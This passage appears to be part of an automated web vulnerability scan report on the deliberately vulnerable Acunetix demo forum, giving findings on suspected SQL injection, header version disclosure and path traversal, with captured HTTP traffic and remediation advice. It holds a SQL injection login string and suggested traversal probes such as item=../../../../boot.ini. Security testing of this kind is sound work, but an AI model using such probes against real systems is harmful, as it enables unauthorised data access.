Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:09:26 GMT
Content-Length: 4010


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum Miscellaneous</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout admin' or '1'='1</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<div class="path">
			Miscellaneous
		</div>
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Thread</td>
        <td class="tableheader">Posts</td>
		<td class="tableheader">Posted by</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	
	</table>
	
      <!-- tinyMCE -->
      <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script>
      <script language="javascript" type="text/javascript">
	// Notice: The simple theme does not use all options some of them are limited to the advanced theme
	tinyMCE.init({
		mode : "textareas",
		theme : "simple"
	});
		</script>
      <!-- /tinyMCE -->
      <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded">
        <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm">
          <tr>
            <td>Thread title<br>
              <center>
                <input name="tfSubject" type="text" class="postit" id="tfSubject">
              </center></td>
          </tr>
          <tr>
            <td>Thread message<br>
              <center>
                <textarea name="tfText" class="postit" id="tfText"></textarea>
              </center></td>
          </tr>
          <tr>
            <td align="right"><input type="submit" value="Post it"></td>
          </tr>
        </table>
      </form>
      
	<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.

Medium CWE-89 - SQL Injection 1 finding

↩ Glossary38. Suspected SQL injection in 'id' parameter of showforum.asp
Severity: Medium  |  Confidence: Tentative  |  CWE: CWE-89 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-19 14:11:05
URL
http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Detail
The traffic repeatedly references a numeric lookup parameter id=2 on showforum.asp (in the Referer header and inside the RetURL return path), indicating an identifier that feeds a backend record lookup. Such a numeric parameter reaching a data-access query is a classic SQL injection candidate; this cannot be confirmed from the captured GET alone and warrants active testing of showforum.asp?id=.
AI Confidence
55%
Evidence
Referer: http://testasp.vulnweb.com/showforum.asp?id=2  and  RetURL=%2Fshowforum%2Easp%3Fid%3D2  (/showforum.asp?id=2)
HTTP Request
Full request
GET /Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/showforum.asp?id=2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:09:02 GMT
Content-Length: 3214


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum login</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<form action="" method="POST">
		<table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm">
            <tr>
              <td>Username:</td>
              <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td>
            </tr>
            <tr>
              <td>Password:</td>
              <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
              <td align="right"><input type="submit" value="Login"></td>
            </tr>
          </table>
	  </form>
		  
    <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.

Low CWE-200 - Exposure of Sensitive Information 1 finding

↩ Glossary39. Server and technology version disclosure via response headers
Severity: Low  |  Confidence: Firm  |  CWE: CWE-200 [ref]  |  OWASP: A05:2021  |  Discovered: 2026-07-18 19:43:18
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=test
Detail
The response includes a 'Server: Microsoft-IIS/8.5' header and an 'X-Powered-By' header, disclosing the web server product/version and backend technology. This information helps an attacker fingerprint the stack and target known vulnerabilities for those specific versions.
AI Confidence
88%
Evidence
Server: Microsoft-IIS/8.5 ; X-Powered-By: ASP.NET
HTTP Request
Full request
GET /Search.asp?tfSearch=test HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:41:46 GMT
Content-Length: 2964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for 'test'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

The application disclosed information that, while not directly exploitable, assists an attacker - for example an internal filesystem path, an internal IP address or hostname, software version detail, or other implementation specifics. Exposure of sensitive information to an unauthorised actor lowers the effort required to find and exploit other weaknesses and aids targeting.

Severity is generally low and depends on the sensitivity of what is revealed; it should be remediated to reduce the overall attack surface.

Remediation

Minimise what the application reveals:

  • Suppress internal paths, hostnames, IPs, and verbose version banners from responses, errors, headers, and comments.
  • Return only the data each response needs; review for over-sharing in APIs and error conditions.
  • Disable directory listing and remove backup/temporary files from the web root.

Low CWE-22 - Path Traversal 2 findings

↩ Glossary40. Path traversal / local file inclusion candidate in 'item' parameter
Severity: Low  |  Confidence: Tentative  |  CWE: CWE-22 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 13:37:58
URL
http://testasp.vulnweb.com/showthread.asp?id=1
Detail
The navigation menu exposes an endpoint whose 'item' parameter carries a file path (item=html/about.html style value). Parameters that reference a filesystem path are common directory-traversal / local-file-inclusion sinks, and the application's own banner explicitly states it is vulnerable to 'directory traversal'. Exploitation cannot be confirmed from this response, so it is reported for verification by supplying sequences such as item=../../../../boot.ini.
AI Confidence
55%
Evidence
<a href="Templatize.asp?item=html/about.html" class="menu">about</a>  and banner: "deliberately vulnerable to ... directory traversal"
HTTP Request
Full request
GET /showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=GOOKGGOBIDCPDDOIBCOBOPFH; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 17:35:48 GMT
Connection: close
Content-Length: 3031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum
2
</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<div class="path">
			<a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/2
		</div>
      <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5">
        <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:28 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>2</div><div class='posttext'>2</div></td></tr>
      </table>
      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Path traversal (directory traversal) and file inclusion arise when user input is used to build a filesystem path or an inclusion target without proper validation, allowing an attacker to escape the intended directory using traversal sequences (../, encoded variants, absolute paths). This grants read access to arbitrary files - application source code, configuration and credential files, /etc/passwd, Java WEB-INF/web.xml, framework secrets - and, where the target is included or executed, can lead to remote code execution.

The disclosed material (source, keys, connection strings, tokens) frequently enables a far more serious follow-on compromise, so the issue is treated as high severity even when it appears to "only" read files.

Remediation

Remove user control over the filesystem path:

  • Avoid passing user input to filesystem APIs. Where possible map an opaque identifier to a server-side path via a fixed lookup table.
  • Canonicalise and verify containment - resolve the requested path to its canonical absolute form and confirm it is still inside the intended base directory before opening it; reject otherwise.
  • Strict allow-list validation of the filename (e.g. a known set of names, or [A-Za-z0-9_-] with a fixed extension); decode once and reject traversal sequences and null bytes.
  • Disable remote/dynamic inclusion (e.g. PHP allow_url_include) and run with least filesystem privilege.
↩ Glossary41. Possible path traversal / local file inclusion via 'item' parameter
Severity: Low  |  Confidence: Tentative  |  CWE: CWE-22 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 11:36:05
URL
http://testasp.vulnweb.com/showforum.asp?id=0
Detail
A navigation link in the response passes a file-like path through an 'item' parameter (item=html/...), indicating an endpoint that selects server-side content based on a caller-supplied path fragment. If the value is used to build a filesystem path or include without canonicalisation, an attacker could supply traversal sequences (e.g. ../../) to read files outside the intended directory. This is a suggestive structural observation from a response link rather than a confirmed traversal.
AI Confidence
54%
Evidence
<a href="Templatize.asp?item=html/about.html" class="menu">about</a>
HTTP Request
Full request
GET /showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Default.asp
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:32:29 GMT
Content-Length: 3788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum Acunetix Web Vulnerability Scanner</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<div class="path">
			Acunetix Web Vulnerability Scanner
		</div>
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Thread</td>
        <td class="tableheader">Posts</td>
		<td class="tableheader">Posted by</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	<tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>1</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:25 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>2</a></div></td><td>2</td><td>admin</td><td>7/19/2026 3:23:36 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>3</a></div></td><td>2</td><td>admin</td><td>11/9/2005 1:08:52 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>aaa</a></div></td><td>1</td><td>admin</td><td>11/9/2005 1:45:54 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>Спилы Деревьев
</a></div></td><td>1</td><td>Charlesitaxy</td><td>7/19/2026 3:22:51 PM</td></tr>
	</table>
	
	<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Path traversal (directory traversal) and file inclusion arise when user input is used to build a filesystem path or an inclusion target without proper validation, allowing an attacker to escape the intended directory using traversal sequences (../, encoded variants, absolute paths). This grants read access to arbitrary files - application source code, configuration and credential files, /etc/passwd, Java WEB-INF/web.xml, framework secrets - and, where the target is included or executed, can lead to remote code execution.

The disclosed material (source, keys, connection strings, tokens) frequently enables a far more serious follow-on compromise, so the issue is treated as high severity even when it appears to "only" read files.

Remediation

